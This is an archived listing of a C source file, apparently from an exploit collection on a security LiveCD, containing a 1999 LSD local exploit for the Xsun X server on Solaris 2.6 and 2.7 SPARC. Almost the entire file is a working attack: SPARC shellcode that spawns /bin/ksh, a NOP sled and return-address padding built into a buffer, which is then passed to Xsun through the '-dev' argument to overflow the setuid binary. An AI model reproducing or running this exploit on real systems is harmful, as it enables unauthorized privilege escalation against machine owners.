home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / xsun.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  51 lines

  1. /*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
  2. /*## /usr/openwin/bin/xsun                                                   #*/
  3.  
  4. #define NOPNUM 3000
  5. #define ADRNUM 2000
  6. #define ALLIGN 2
  7.  
  8. char shellcode[]=
  9.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
  10.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
  11.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
  12.     "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
  13.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
  14.     "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
  15.     "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
  16.     "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
  17.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
  18.     "\x91\xd0\x20\x08"     /* ta      8                    */
  19.     "/bin/ksh"
  20. ;
  21.  
  22. char jump[]=
  23.     "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
  24.     "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
  25. ;
  26.  
  27. static char nop[]="\x80\x1c\x40\x11";
  28.  
  29. main(int argc,char **argv){
  30.     char buffer[10000],adr[4],*b;
  31.     int i;
  32.  
  33.     printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
  34.     printf("/usr/openwin/bin/xsun for solaris 2.6 2.7 sparc\n\n");
  35.  
  36.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+6048+1520;
  37.   
  38.     b=buffer; 
  39.     sprintf(b,":");
  40.     b+=1;
  41.     for(i=0;i<ALLIGN;i++) *b++=0xff;
  42.     for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
  43.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  44.     for(i=0;i<ALLIGN;i++) *b++=0xff;
  45.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  46.     *b=0;
  47.  
  48.     execle("/usr/openwin/bin/Xsun","lsd","-dev",buffer,0,0);
  49. }
  50.  
  51.